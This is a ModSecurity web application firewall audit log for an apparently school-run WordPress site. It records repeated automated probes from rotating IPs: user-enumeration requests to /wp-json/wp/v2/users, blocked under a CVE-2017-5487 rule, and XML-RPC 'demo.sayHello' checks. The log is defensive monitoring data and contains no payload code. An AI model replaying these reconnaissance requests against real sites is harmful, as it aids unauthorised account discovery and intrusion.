combined=4679, p1=600, p2=3889, p3=44, p4=35, p5=67, sr=77, sw=44, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ad36606-Z-- --1050ed42-A-- [17/May/2025:03:38:05 +0700] aCeiLXyxdQCiyU1ENFchYgAAAAU 103.236.140.4 55360 103.236.140.4 8181 --1050ed42-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1050ed42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1050ed42-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427885509194 2749 (- - -) Stopwatch2: 1747427885509194 2749; combined=1219, p1=416, p2=774, p3=0, p4=0, p5=28, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1050ed42-Z-- --108c060b-A-- [17/May/2025:03:38:10 +0700] aCeiMnyxdQCiyU1ENFchZAAAAAg 103.236.140.4 55364 103.236.140.4 8181 --108c060b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.70 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --108c060b-C-- demo.sayHello --108c060b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --108c060b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427890189155 5566 (- - -) Stopwatch2: 1747427890189155 5566; combined=4132, p1=529, p2=3383, p3=29, p4=30, p5=97, sr=75, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --108c060b-Z-- --38f6522e-A-- [17/May/2025:03:40:53 +0700] aCei1XyxdQCiyU1ENFchaQAAAA8 103.236.140.4 55378 103.236.140.4 8181 --38f6522e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --38f6522e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38f6522e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747428053169617 2243 (- - -) Stopwatch2: 1747428053169617 2243; combined=1195, p1=392, p2=774, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38f6522e-Z-- --87112c43-A-- [17/May/2025:03:40:58 +0700] aCei2nyxdQCiyU1ENFchawAAABU 103.236.140.4 55382 103.236.140.4 8181 --87112c43-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.219 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --87112c43-C-- demo.sayHello --87112c43-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --87112c43-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747428058560404 5795 (- - -) Stopwatch2: 1747428058560404 5795; combined=4196, p1=543, p2=3435, p3=31, p4=35, p5=91, sr=76, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87112c43-Z-- --e68f2909-A-- [17/May/2025:03:41:00 +0700] aCei3HyxdQCiyU1ENFchbAAAABY 103.236.140.4 55384 103.236.140.4 8181 --e68f2909-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.95 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.95 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e68f2909-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e68f2909-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747428060459251 2084 (- - -) Stopwatch2: 1747428060459251 2084; combined=903, p1=293, p2=574, p3=0, p4=0, p5=36, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e68f2909-Z-- --7581b110-A-- [17/May/2025:03:41:08 +0700] aCei5HyxdQCiyU1ENFchbwAAAAA 103.236.140.4 55390 103.236.140.4 8181 --7581b110-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.95 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.95 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7581b110-C-- demo.sayHello --7581b110-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7581b110-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747428068128982 4728 (- - -) Stopwatch2: 1747428068128982 4728; combined=3445, p1=499, p2=2764, p3=27, p4=27, p5=76, sr=83, sw=52, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7581b110-Z-- --b72f3904-A-- [17/May/2025:03:42:29 +0700] aCejNXyxdQCiyU1ENFchdAAAAAw 103.236.140.4 55408 103.236.140.4 8181 --b72f3904-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.78 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.78 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b72f3904-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b72f3904-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747428149729908 3255 (- - -) Stopwatch2: 1747428149729908 3255; combined=1460, p1=512, p2=916, p3=0, p4=0, p5=32, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b72f3904-Z-- --d102a00a-A-- [17/May/2025:03:42:35 +0700] aCejO3yxdQCiyU1ENFchdgAAAA4 103.236.140.4 55412 103.236.140.4 8181 --d102a00a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.78 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.78 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d102a00a-C-- demo.sayHello --d102a00a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d102a00a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747428155866044 5758 (- - -) Stopwatch2: 1747428155866044 5758; combined=4228, p1=538, p2=3450, p3=34, p4=33, p5=101, sr=77, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d102a00a-Z-- --3b68711f-A-- [17/May/2025:03:46:29 +0700] aCekJXyxdQCiyU1ENFchfwAAAAU 103.236.140.4 55434 103.236.140.4 8181 --3b68711f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3b68711f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b68711f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747428389200644 2740 (- - -) Stopwatch2: 1747428389200644 2740; combined=1223, p1=419, p2=776, p3=0, p4=0, p5=28, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b68711f-Z-- --735ec44d-A-- [17/May/2025:03:46:37 +0700] aCekLXyxdQCiyU1ENFchgQAAAAc 103.236.140.4 55438 103.236.140.4 8181 --735ec44d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.236 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --735ec44d-C-- demo.sayHello --735ec44d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --735ec44d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747428397295182 6148 (- - -) Stopwatch2: 1747428397295182 6148; combined=4429, p1=547, p2=3645, p3=30, p4=34, p5=101, sr=75, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --735ec44d-Z-- --5561343f-A-- [17/May/2025:03:46:37 +0700] aCekLXyxdQCiyU1ENFchggAAAAg 103.236.140.4 55440 103.236.140.4 8181 --5561343f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5561343f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5561343f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747428397536891 2457 (- - -) Stopwatch2: 1747428397536891 2457; combined=1176, p1=426, p2=723, p3=0, p4=0, p5=27, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5561343f-Z-- --3bf15d48-A-- [17/May/2025:03:46:42 +0700] aCekMnyxdQCiyU1ENFchhAAAAAs 103.236.140.4 55446 103.236.140.4 8181 --3bf15d48-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.11 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3bf15d48-C-- demo.sayHello --3bf15d48-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3bf15d48-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747428402883830 6370 (- - -) Stopwatch2: 1747428402883830 6370; combined=4453, p1=660, p2=3557, p3=31, p4=35, p5=99, sr=108, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3bf15d48-Z-- --95d47220-A-- [17/May/2025:03:48:13 +0700] aCekjRKi5m5upc8uMd6eDQAAAME 103.236.140.4 55456 103.236.140.4 8181 --95d47220-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --95d47220-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95d47220-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747428493420664 2966 (- - -) Stopwatch2: 1747428493420664 2966; combined=1430, p1=556, p2=847, p3=0, p4=0, p5=27, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95d47220-Z-- --52a2172b-A-- [17/May/2025:03:48:18 +0700] aCekknyxdQCiyU1ENFchhgAAAA4 103.236.140.4 55464 103.236.140.4 8181 --52a2172b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.111 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --52a2172b-C-- demo.sayHello --52a2172b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --52a2172b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747428498616137 5783 (- - -) Stopwatch2: 1747428498616137 5783; combined=4192, p1=592, p2=3382, p3=28, p4=31, p5=94, sr=123, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52a2172b-Z-- --2e856961-A-- [17/May/2025:03:54:52 +0700] aCemHHyxdQCiyU1ENFchjwAAAAk 103.236.140.4 55512 103.236.140.4 8181 --2e856961-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2e856961-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e856961-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747428892562820 2779 (- - -) Stopwatch2: 1747428892562820 2779; combined=1238, p1=442, p2=766, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e856961-Z-- --bad2ab60-A-- [17/May/2025:03:54:56 +0700] aCemIBKi5m5upc8uMd6eEQAAAMg 103.236.140.4 55516 103.236.140.4 8181 --bad2ab60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.236 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bad2ab60-C-- demo.sayHello --bad2ab60-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bad2ab60-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747428896622597 5654 (- - -) Stopwatch2: 1747428896622597 5654; combined=4152, p1=529, p2=3376, p3=29, p4=31, p5=106, sr=78, sw=81, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bad2ab60-Z-- --62a2d17e-A-- [17/May/2025:03:55:54 +0700] aCemWnyxdQCiyU1ENFchkgAAAA4 103.236.140.4 55522 103.236.140.4 8181 --62a2d17e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.143 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.143 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --62a2d17e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62a2d17e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s 